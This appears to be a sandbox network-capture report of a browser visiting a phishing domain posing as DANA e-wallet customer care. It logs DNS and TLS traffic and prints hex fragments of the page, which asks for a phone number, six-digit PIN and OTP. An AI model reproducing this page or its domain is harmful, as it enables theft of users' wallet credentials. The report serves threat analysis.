                                                  Oct 13, 2024 19:34:43.709780931 CEST4434995513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.710834980 CEST4434995613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.711319923 CEST49956443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.711369038 CEST4434995613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.711766958 CEST49956443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.711782932 CEST4434995613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.715508938 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.715836048 CEST49957443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.715918064 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.716243029 CEST49957443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.716259003 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.744173050 CEST4434995813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.745071888 CEST49958443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.745071888 CEST49958443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.745080948 CEST4434995813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.745095015 CEST4434995813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.814606905 CEST4434995513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.814914942 CEST4434995513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.814965010 CEST4434995513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.814997911 CEST49955443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.815088987 CEST49955443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.815088987 CEST49955443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.815159082 CEST49955443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.815181017 CEST4434995513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.816567898 CEST4434995613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.816586971 CEST4434995613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.816667080 CEST4434995613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.816706896 CEST49956443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.816876888 CEST49956443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.816878080 CEST49956443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.817019939 CEST49956443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.817048073 CEST4434995613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.818608046 CEST49959443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.818655014 CEST4434995913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.818730116 CEST49959443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.818934917 CEST49959443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.818964005 CEST4434995913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.820415020 CEST49960443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.820462942 CEST4434996013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.820539951 CEST49960443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.821059942 CEST49960443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.821078062 CEST4434996013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.825263023 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.825304985 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.825364113 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.825493097 CEST49957443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.825553894 CEST49957443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.825553894 CEST49957443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.825591087 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.825613022 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.827424049 CEST49961443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.827456951 CEST4434996113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.827686071 CEST49961443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.827687025 CEST49961443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.827719927 CEST4434996113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.852359056 CEST4434995813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.852437019 CEST4434995813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.852629900 CEST49958443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.852673054 CEST49958443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.852673054 CEST49958443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.852684021 CEST4434995813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.852690935 CEST4434995813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.855416059 CEST49962443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.855437040 CEST4434996213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.855669022 CEST49962443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.855669975 CEST49962443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.855703115 CEST4434996213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.069874048 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.069897890 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.069936037 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.069988012 CEST49954443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.070179939 CEST49954443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.070179939 CEST49954443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.070198059 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.070228100 CEST49954443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.070233107 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.072666883 CEST49963443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.072685003 CEST4434996313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.073070049 CEST49963443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.073070049 CEST49963443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.073095083 CEST4434996313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.470845938 CEST4434996013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.471785069 CEST49960443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.471785069 CEST49960443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.471801996 CEST4434996013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.471816063 CEST4434996013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.475366116 CEST4434995913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.476083040 CEST49959443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.476083994 CEST49959443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.476170063 CEST4434995913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.476201057 CEST4434995913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.510189056 CEST4434996113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.510891914 CEST49961443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.510891914 CEST49961443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:44.510940075 CEST4434996113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:44.510962009 CEST4434996113.107.246.45192.168.2.4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 13, 2024 19:33:22.573417902 CEST53575081.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:22.585705042 CEST53565181.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:23.712116957 CEST53538851.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:24.051031113 CEST6225753192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:24.051265955 CEST5271253192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:24.215022087 CEST53527121.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:24.217325926 CEST53622571.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:25.617897987 CEST5902153192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:25.618062019 CEST6013453192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:25.625143051 CEST53601341.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:25.626718998 CEST53590211.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:25.736381054 CEST53643621.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:26.387892008 CEST5034953192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:26.388016939 CEST5730453192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:26.395158052 CEST53573041.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:26.395802975 CEST53503491.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:26.755987883 CEST5321653192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:26.756283998 CEST6010353192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:26.865156889 CEST53601031.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:26.865349054 CEST53532161.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:27.178570032 CEST6277353192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:27.178884983 CEST5341753192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:27.192300081 CEST53627731.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:27.202508926 CEST53534171.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:28.333794117 CEST53588061.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.050318956 CEST5595653192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:31.050713062 CEST5708153192.168.2.41.1.1.1
                                                  Oct 13, 2024 19:33:31.057223082 CEST53559561.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.059586048 CEST53570811.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:38.204020023 CEST138138192.168.2.4192.168.2.255
                                                  Oct 13, 2024 19:33:40.752453089 CEST53613401.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:33:59.981673956 CEST53646371.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:34:22.469355106 CEST53559781.1.1.1192.168.2.4
                                                  Oct 13, 2024 19:34:23.065146923 CEST53653981.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 13, 2024 19:33:24.051031113 CEST192.168.2.41.1.1.10x83bdStandard query (0)bantuan-customer-care-dana.officio.asiaA (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:24.051265955 CEST192.168.2.41.1.1.10xe4f3Standard query (0)bantuan-customer-care-dana.officio.asia65IN (0x0001)false
                                                  Oct 13, 2024 19:33:25.617897987 CEST192.168.2.41.1.1.10x1f5dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:25.618062019 CEST192.168.2.41.1.1.10xf856Standard query (0)code.jquery.com65IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.387892008 CEST192.168.2.41.1.1.10x8883Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.388016939 CEST192.168.2.41.1.1.10xa0e9Standard query (0)code.jquery.com65IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.755987883 CEST192.168.2.41.1.1.10xeed5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.756283998 CEST192.168.2.41.1.1.10x35e9Standard query (0)www.google.com65IN (0x0001)false
                                                  Oct 13, 2024 19:33:27.178570032 CEST192.168.2.41.1.1.10xd694Standard query (0)bantuan-customer-care-dana.officio.asiaA (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:27.178884983 CEST192.168.2.41.1.1.10xda34Standard query (0)bantuan-customer-care-dana.officio.asia65IN (0x0001)false
                                                  Oct 13, 2024 19:33:31.050318956 CEST192.168.2.41.1.1.10x2c93Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:31.050713062 CEST192.168.2.41.1.1.10xa14aStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 13, 2024 19:33:24.215022087 CEST1.1.1.1192.168.2.40xe4f3No error (0)bantuan-customer-care-dana.officio.asia65IN (0x0001)false
                                                  Oct 13, 2024 19:33:24.217325926 CEST1.1.1.1192.168.2.40x83bdNo error (0)bantuan-customer-care-dana.officio.asia172.67.207.178A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:24.217325926 CEST1.1.1.1192.168.2.40x83bdNo error (0)bantuan-customer-care-dana.officio.asia104.21.61.83A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:25.626718998 CEST1.1.1.1192.168.2.40x1f5dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:25.626718998 CEST1.1.1.1192.168.2.40x1f5dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:25.626718998 CEST1.1.1.1192.168.2.40x1f5dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:25.626718998 CEST1.1.1.1192.168.2.40x1f5dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.395802975 CEST1.1.1.1192.168.2.40x8883No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.395802975 CEST1.1.1.1192.168.2.40x8883No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.395802975 CEST1.1.1.1192.168.2.40x8883No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.395802975 CEST1.1.1.1192.168.2.40x8883No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.865156889 CEST1.1.1.1192.168.2.40x35e9No error (0)www.google.com65IN (0x0001)false
                                                  Oct 13, 2024 19:33:26.865349054 CEST1.1.1.1192.168.2.40xeed5No error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:27.192300081 CEST1.1.1.1192.168.2.40xd694No error (0)bantuan-customer-care-dana.officio.asia104.21.61.83A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:27.192300081 CEST1.1.1.1192.168.2.40xd694No error (0)bantuan-customer-care-dana.officio.asia172.67.207.178A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:27.202508926 CEST1.1.1.1192.168.2.40xda34No error (0)bantuan-customer-care-dana.officio.asia65IN (0x0001)false
                                                  Oct 13, 2024 19:33:31.057223082 CEST1.1.1.1192.168.2.40x2c93No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:36.857460022 CEST1.1.1.1192.168.2.40xe144No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 13, 2024 19:33:36.857460022 CEST1.1.1.1192.168.2.40xe144No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:33:49.003381014 CEST1.1.1.1192.168.2.40xc7d3No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 13, 2024 19:33:49.003381014 CEST1.1.1.1192.168.2.40xc7d3No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:34:15.081446886 CEST1.1.1.1192.168.2.40xccd4No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 13, 2024 19:34:15.081446886 CEST1.1.1.1192.168.2.40xccd4No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:34:15.368585110 CEST1.1.1.1192.168.2.40x69e5No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 13, 2024 19:34:15.368585110 CEST1.1.1.1192.168.2.40x69e5No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                  Oct 13, 2024 19:34:35.459018946 CEST1.1.1.1192.168.2.40x8bc5No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 13, 2024 19:34:35.459018946 CEST1.1.1.1192.168.2.40x8bc5No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                  • bantuan-customer-care-dana.officio.asia
                                                  • https:
                                                    • code.jquery.com
                                                  • fs.microsoft.com
                                                  • a.nel.cloudflare.com
                                                  • slscr.update.microsoft.com
                                                  • otelrules.azureedge.net
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449738172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:25 UTC682OUTGET / HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:25 UTC655INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:25 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VET6mjToamiHn%2FfIwqR3AzQqxF8oyBNjtxMs4MPshcNwU059NK1V0tJAJo6%2FR3PTCewfV1zvVmtE1vl8c1AMqxSamydwJsAPVMQf7Jok7O7ffw3fWBFCPqSmR%2FcxngwF0H%2BEesCBXJ6PvYr2JJZO%2Fgfd%2FbTqthSuKzA%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Speculation-Rules: "/cdn-cgi/speculation"
                                                  Server: cloudflare
                                                  CF-RAY: 8d211318db7e429d-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:25 UTC1369INData Raw: 32 35 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e 44 41 4e 41 20 2d 20 41 70 61 20 70 75 6e 20 74 72 61 6e 73 61 6b 73 69 6e 79 61 20 73 65 6c 61 6c 75 20 61 64 61 20 44 41 4e 41
                                                  Data Ascii: 25f6<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>DANA - Apa pun transaksinya selalu ada DANA
                                                  2024-10-13 17:33:25 UTC1369INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 61 73 74 2f 30 30 62 39 64 32 65 39 66 35 32 65 35 30 35 63 30 31 33 63 31 36 62 62 36 33 38 61 34 32 61 34 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 61 73 74 2f 36 39 39 30 61 37 30 33 33 62 62 61 65 61 64 63 32 30 34 30 61 63 38 36 33 66 66 31 32 34 66 64 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 61 73 74 2f 33 66 61 64 63 36 37 36 35 38 32 62 39 35 34 32 30 30 34 62 35 30 32 65 65 30 33 64 66 33 61 33 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 61 73 74 2f 34 37 65 34 63 35 38 66 36
                                                  Data Ascii: <link rel="stylesheet" href="ast/00b9d2e9f52e505c013c16bb638a42a4.css"><link rel="stylesheet" href="ast/6990a7033bbaeadc2040ac863ff124fd.css"><link rel="stylesheet" href="ast/3fadc676582b9542004b502ee03df3a3.css"><link rel="stylesheet" href="ast/47e4c58f6
                                                  2024-10-13 17:33:25 UTC1369INData Raw: 6d 69 74 3d 22 73 65 6e 64 4e 6f 68 70 28 65 76 65 6e 74 29 3b 22 3e 3c 68 33 3e 4d 61 73 75 6b 6b 61 6e 20 3c 62 3e 6e 6f 6d 6f 72 20 48 50 3c 2f 62 3e 20 6b 61 6d 75 20 75 6e 74 75 6b 20 6c 61 6e 6a 75 74 3c 2f 68 33 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 2d 69 6e 70 75 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 62 65 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 74 2f 69 6d 67 2f 69 6e 64 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 3c 6c 61 62 65 6c 3e 2b 36 32 3c 2f 6c 61 62 65 6c 3e 3c 2f 64 69 76 3e 3c 69 6e 70 75 74 20 69 64 3d 22 69 6e 70 22 20 74 79 70 65 3d 22 74 65 6c 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 22 70 68 6f 6e 65 4e 75 6d 62 65 72 22 20 70 6c 61 63 65 68
                                                  Data Ascii: mit="sendNohp(event);"><h3>Masukkan <b>nomor HP</b> kamu untuk lanjut</h3><div class="box-input"><div class="label"><img src="ast/img/indo.png" alt=""><label>+62</label></div><input id="inp" type="tel" autocomplete="off" required name="phoneNumber" placeh
                                                  2024-10-13 17:33:25 UTC1369INData Raw: 73 73 3d 22 69 66 28 74 68 69 73 2e 76 61 6c 75 65 2e 6c 65 6e 67 74 68 3d 3d 31 29 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 70 69 6e 35 22 20 69 64 3d 22 70 69 6e 35 22 20 63 6c 61 73 73 3d 22 69 6e 70 70 69 6e 22 20 69 6e 70 75 74 6d 6f 64 65 3d 22 6e 75 6d 65 72 69 63 22 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 72 65 71 75 69 72 65 64 20 6d 61 78 6c 65 6e 67 74 68 3d 22 31 22 20 6f 6e 4b 65 79 50 72 65 73 73 3d 22 69 66 28 74 68 69 73 2e 76 61 6c 75 65 2e 6c 65 6e 67 74 68 3d 3d 31 29 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 70 69 6e 36 22 20 69 64 3d 22 70 69 6e 36 22 20 63 6c 61 73 73 3d 22 69
                                                  Data Ascii: ss="if(this.value.length==1) return false;"><input name="pin5" id="pin5" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onKeyPress="if(this.value.length==1) return false;"><input name="pin6" id="pin6" class="i
                                                  2024-10-13 17:33:25 UTC1369INData Raw: 3d 22 69 6e 70 6f 74 70 22 20 69 6e 70 75 74 6d 6f 64 65 3d 22 6e 75 6d 65 72 69 63 22 20 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 72 65 71 75 69 72 65 64 20 6d 61 78 6c 65 6e 67 74 68 3d 22 31 22 20 6f 6e 4b 65 79 50 72 65 73 73 3d 22 69 66 28 74 68 69 73 2e 76 61 6c 75 65 2e 6c 65 6e 67 74 68 3d 3d 31 29 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 3c 2f 64 69 76 3e 3c 70 20 63 6c 61 73 73 3d 22 72 65 73 65 6e 64 22 3e 4b 49 52 49 4d 20 55 4c 41 4e 47 20 28 3c 73 70 61 6e 20 69 64 3d 22 63 6f 75 6e 74 64 6f 77 6e 22 3e 31 32 30 3c 2f 73 70 61 6e 3e 73 29 3c 2f 70 3e 3c 2f 66 6f 72 6d 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73
                                                  Data Ascii: ="inpotp" inputmode="numeric" type="number" autocomplete="off" required maxlength="1" onKeyPress="if(this.value.length==1) return false;"></div><p class="resend">KIRIM ULANG (<span id="countdown">120</span>s)</p></form></div></div></div><script src="https
                                                  2024-10-13 17:33:25 UTC1369INData Raw: 73 74 20 69 6e 64 65 78 20 3d 20 69 6e 70 75 74 73 2e 69 6e 64 65 78 28 74 68 69 73 29 3b 69 66 20 28 6b 65 79 20 3d 3d 3d 20 27 42 61 63 6b 73 70 61 63 65 27 20 26 26 20 65 76 65 6e 74 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 2e 6c 65 6e 67 74 68 20 3d 3d 3d 20 30 29 20 7b 69 66 20 28 69 6e 64 65 78 20 3e 20 30 29 20 7b 69 6e 70 75 74 73 5b 69 6e 64 65 78 20 2d 20 31 5d 2e 66 6f 63 75 73 28 29 3b 7d 7d 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 24 28 27 2e 69 6e 70 6f 74 70 27 29 2e 6f 6e 28 27 69 6e 70 75 74 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 63 6f 6e 73 74 20 69 6e 70 75 74 73 20 3d 20 24 28 27 2e 69 6e 70 6f 74 70 27 29 3b 63 6f 6e 73 74 20 69 73 41 6c 6c 46 69 6c 6c 65 64 20 3d 20 41 72 72 61 79 2e 66 72 6f
                                                  Data Ascii: st index = inputs.index(this);if (key === 'Backspace' && event.target.value.length === 0) {if (index > 0) {inputs[index - 1].focus();}};});</script><script>$('.inpotp').on('input', function(event) {const inputs = $('.inpotp');const isAllFilled = Array.fro
